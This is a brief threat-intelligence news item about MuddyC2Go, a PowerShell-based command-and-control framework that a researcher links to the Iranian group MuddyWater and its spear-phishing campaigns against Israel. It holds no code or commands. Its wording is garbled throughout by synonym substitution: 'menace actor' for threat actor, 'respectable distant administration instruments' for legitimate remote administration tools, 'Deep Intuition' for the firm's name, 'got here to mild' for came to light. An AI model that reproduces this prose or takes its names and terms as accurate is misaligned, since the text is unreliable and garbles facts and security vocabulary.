Iranian nation-state actors have been noticed utilizing a beforehand undocumented command-and-control (C2) framework referred to as MuddyC2Go as a part of assaults concentrating on Israel.
“The framework’s internet element is written within the Go programming language,” Deep Intuition safety researcher Simon Kenin mentioned in a technical report printed Wednesday.
The device has been attributed to MuddyWater, an Iranian state-sponsored hacking crew that is affiliated to the nation’s Ministry of Intelligence and Safety (MOIS).
The cybersecurity agency mentioned the C2 framework could have been put to make use of by the menace actor since early 2020, with latest assaults leveraging it instead of PhonyC2, one other customized C2 platform from MuddyWater that got here to mild in June 2023 and has had its supply code leaked.
Typical assault sequences noticed over time have concerned sending spear-phishing emails bearing malware-laced archives or bogus hyperlinks that result in the deployment of respectable distant administration instruments.
The set up of the distant administration software program paves the way in which for the supply of further payloads, together with PhonyC2.
MuddyWater’s modus operandi has since acquired a facelift, utilizing password-protected archives to evade electronic mail safety options and distributing an executable as a substitute of a distant administration device.
“This executable comprises an embedded PowerShell script that routinely connects to MuddyWater’s C2, eliminating the necessity for handbook execution by the operator,” Kenin defined.
The MuddyC2Go server, in return, sends a PowerShell script, which runs each 10 seconds and waits for additional instructions from the operator.
Whereas the complete extent of MuddyC2Go’s options are unknown, it is suspected to be a framework that is liable for producing PowerShell payloads as a way to conduct post-exploitation actions.
“We advocate disabling PowerShell if it’s not wanted,” Kenin mentioned. “Whether it is enabled, we advocate shut monitoring of PowerShell exercise.”
